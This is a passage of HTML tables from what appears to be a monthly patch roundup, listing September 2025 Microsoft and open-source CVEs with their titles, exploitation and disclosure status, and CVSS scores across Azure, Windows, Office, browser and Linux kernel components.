href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55232">CVE-2025-55232</a></td><td><p>Microsoft High Performance Compute (HPC) Pack Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>9.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55241">CVE-2025-55241</a></td><td><p>Azure Entra Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>9</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55244">CVE-2025-55244</a></td><td><p>Azure Bot Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>9</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49692">CVE-2025-49692</a></td><td><p>Azure Connected Machine Agent Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55316">CVE-2025-55316</a></td><td><p>Azure Arc Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr></tbody></table><h3>Browser vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53791">CVE-2025-53791</a></td><td><p>Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-9867">CVE-2025-9867</a></td><td><p>Chromium: CVE-2025-9867 Inappropriate implementation in Downloads</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-9866">CVE-2025-9866</a></td><td><p>Chromium: CVE-2025-9866 Inappropriate implementation in Extensions</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-9865">CVE-2025-9865</a></td><td><p>Chromium: CVE-2025-9865 Inappropriate implementation in Toolbar</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-9864">CVE-2025-9864</a></td><td><p>Chromium: CVE-2025-9864 Use after free in V8</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr></tbody></table><h3>ESU Windows vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55234">CVE-2025-55234</a></td><td><p>Windows SMB Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>Yes</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54106">CVE-2025-54106</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54113">CVE-2025-54113</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54918">CVE-2025-54918</a></td><td><p>Windows NTLM Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54110">CVE-2025-54110</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54916">CVE-2025-54916</a></td><td><p>Windows NTFS Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54091">CVE-2025-54091</a></td><td><p>Windows Hyper-V Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54098">CVE-2025-54098</a></td><td><p>Windows Hyper-V Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54912">CVE-2025-54912</a></td><td><p>Windows BitLocker Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54895">CVE-2025-54895</a></td><td><p>SPNEGO Extended Negotiation (NEGOEX) Security Mechanism Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54894">CVE-2025-54894</a></td><td><p>Local Security Authority Subsystem Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54911">CVE-2025-54911</a></td><td><p>Windows BitLocker Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54093">CVE-2025-54093</a></td><td><p>Windows TCP/IP Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54099">CVE-2025-54099</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53808">CVE-2025-53808</a></td><td><p>Windows Defender Firewall Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53810">CVE-2025-53810</a></td><td><p>Windows Defender Firewall Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54094">CVE-2025-54094</a></td><td><p>Windows Defender Firewall Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54104">CVE-2025-54104</a></td><td><p>Windows Defender Firewall Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54109">CVE-2025-54109</a></td><td><p>Windows Defender Firewall Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54915">CVE-2025-54915</a></td><td><p>Windows Defender Firewall Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55226">CVE-2025-55226</a></td><td><p>Graphics Kernel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53797">CVE-2025-53797</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53798">CVE-2025-53798</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54095">CVE-2025-54095</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54096">CVE-2025-54096</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54097">CVE-2025-54097</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55225">CVE-2025-55225</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53796">CVE-2025-53796</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53806">CVE-2025-53806</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53804">CVE-2025-53804</a></td><td><p>Windows Kernel-Mode Driver Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53803">CVE-2025-53803</a></td><td><p>Windows Kernel Memory Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54101">CVE-2025-54101</a></td><td><p>Windows SMB Client Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54107">CVE-2025-54107</a></td><td><p>MapUrlToZone Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.3</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54917">CVE-2025-54917</a></td><td><p>MapUrlToZone Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.3</p></td></tr></tbody></table><h3>ESU Windows Microsoft Office vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53799">CVE-2025-53799</a></td><td><p>Windows Imaging Component Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr></tbody></table><h3>Mariner vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-57052">CVE-2025-57052</a></td><td><p>cJSON 1.5.0 through 1.7.18 allows out-of-bounds access via the decode_array_index_from_pointer function in cJSON_Utils.c, allowing remote attackers to bypass array bounds checking and access restricted data via malformed JSON pointer strings containing alphanumeric characters.</p></td><td><p>No</p></td><td><p>No</p></td><td><p>9.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-9566">CVE-2025-9566</a></td><td><p>Podman: podman kube play command may overwrite host files</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.1</p></td></tr></tbody></table><h3>Microsoft Dynamics vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55238">CVE-2025-55238</a></td><td><p>Dynamics 365 FastTrack Implementation Assets Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr></tbody></table><h3>Microsoft Office vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54897">CVE-2025-54897</a></td><td><p>Microsoft SharePoint Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54910">CVE-2025-54910</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54908">CVE-2025-54908</a></td><td><p>Microsoft PowerPoint Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54907">CVE-2025-54907</a></td><td><p>Microsoft Office Visio Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54906">CVE-2025-54906</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54896">CVE-2025-54896</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54898">CVE-2025-54898</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54899">CVE-2025-54899</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54902">CVE-2025-54902</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54903">CVE-2025-54903</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54904">CVE-2025-54904</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54900">CVE-2025-54900</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55317">CVE-2025-55317</a></td><td><p>Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55243">CVE-2025-55243</a></td><td><p>Microsoft OfficePlus Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54905">CVE-2025-54905</a></td><td><p>Microsoft Word Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54901">CVE-2025-54901</a></td><td><p>Microsoft Excel Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr></tbody></table><h3>Open Source Software vulnerabilities</h3><p>At time of writing, Microsoft has published patches for these OSS vulnerabilities, but without providing an accompanying advisory for most of them.</p><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38714">CVE-2025-38714</a></td><td><p>hfsplus: fix slab-out-of-bounds in hfsplus_bnode_read()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>9</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38699">CVE-2025-38699</a></td><td><p>scsi: bfa: Double-free fix</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38702">CVE-2025-38702</a></td><td><p>fbdev: fix potential buffer overflow in do_register_framebuffer()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38685">CVE-2025-38685</a></td><td><p>fbdev: Fix vmalloc out-of-bounds write in fast_imageblit</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38703">CVE-2025-38703</a></td><td><p>drm/xe: Make dma-fences compliant with the safe access rules</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39730">CVE-2025-39730</a></td><td><p>NFS: Fix filehandle bounds checking in nfs_fh_to_dentry()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39683">CVE-2025-39683</a></td><td><p>tracing: Limit access to parser-&gt;buffer when trace_get_user failed</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38697">CVE-2025-38697</a></td><td><p>jfs: upper bound check of tree index in dbAllocAG</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38698">CVE-2025-38698</a></td><td><p>jfs: Regular file corruption check</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39702">CVE-2025-39702</a></td><td><p>ipv6: sr: Fix MAC comparison to be constant-time</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38688">CVE-2025-38688</a></td><td><p>iommufd: Prevent ALIGN() overflow</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39689">CVE-2025-39689</a></td><td><p>ftrace: Also allocate and copy hash for reading of filter files</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39691">CVE-2025-39691</a></td><td><p>fs/buffer: fix use-after-free when call bh_read() helper</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39732">CVE-2025-39732</a></td><td><p>wifi: ath11k: fix sleeping-in-atomic in ath11k_mac_op_set_bitrate_mask()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38718">CVE-2025-38718</a></td><td><p>sctp: linearize cloned gso packets in sctp_rcv</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38695">CVE-2025-38695</a></td><td><p>scsi: lpfc: Check for hdwq null ptr when cleaning up lpfc_vport structure</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39694">CVE-2025-39694</a></td><td><p>s390/sclp: Fix SCCB present check</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39673">CVE-2025-39673</a></td><td><p>ppp: fix race conditions in ppp_fill_forward_path</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38732">CVE-2025-38732</a></td><td><p>netfilter: nf_reject: don't leak dst refcount for loopback packets</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38684">CVE-2025-38684</a></td><td><p>net/sched: ets: use old 'nbands' while purging unused classes</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39677">CVE-2025-39677</a></td><td><p>net/sched: Fix backlog accounting in qdisc_dequeue_internal</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39703">CVE-2025-39703</a></td><td><p>net, hsr: reject HSR frame if skb can't hold tag</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39713">CVE-2025-39713</a></td><td><p>media: rainshadow-cec: fix TOCTOU race condition in rain_interrupt()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39711">CVE-2025-39711</a></td><td><p>media: ivsc: Fix crash at shutdown due to missing mei_cldev_disable() calls</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38709">CVE-2025-38709</a></td><td><p>loop: Avoid updating block size under exclusive owner</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38735">CVE-2025-38735</a></td><td><p>gve: prevent ethtool ops after shutdown</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38710">CVE-2025-38710</a></td><td><p>gfs2: Validate i_depth for exhash directories</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38701">CVE-2025-38701</a></td><td><p>ext4: do not BUG when INLINE_DATA_FL lacks system.data xattr</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38692">CVE-2025-38692</a></td><td><p>exfat: add cluster chain loop check for dir</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39721">CVE-2025-39721</a></td><td><p>crypto: qat - flush misc workqueue during device shutdown</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38729">CVE-2025-38729</a></td><td><p>ALSA: usb-audio: Validate UAC3 power domain descriptors, too</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38724">CVE-2025-38724</a></td><td><p>nfsd: handle get_client_locked() failure in nfsd4_setclientid_confirm()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39682">CVE-2025-39682</a></td><td><p>tls: fix handling of zero-length records on the rx_list</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38708">CVE-2025-38708</a></td><td><p>drbd: add missing kref_get in handle_write_conflicts</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.3</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38713">CVE-2025-38713</a></td><td><p>hfsplus: fix slab-out-of-bounds read in hfsplus_uni2asc()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.1</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38678">CVE-2025-38678</a></td><td><p>netfilter: nf_tables: reject duplicate device on updates</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-9901">CVE-2025-9901</a></td><td><p>Libsoup: improper handling of http vary header in libsoup caching</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.9</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39681">CVE-2025-39681</a></td><td><p>x86/cpu/hygon: Add missing resctrl_cpu_detect() in bsp_init helper</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39718">CVE-2025-39718</a></td><td><p>vsock/virtio: Validate length in packet header before skb_put()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39692">CVE-2025-39692</a></td><td><p>smb: server: split ksmbd_rdma_stop_listening() out of ksmbd_rdma_destroy()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38728">CVE-2025-38728</a></td><td><p>smb3: fix for slab out of bounds on mount to ksmbd</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38711">CVE-2025-38711</a></td><td><p>smb/server: avoid deadlock when linking with ReplaceIfExists</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39724">CVE-2025-39724</a></td><td><p>serial: 8250: fix panic due to PSLVERR</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a 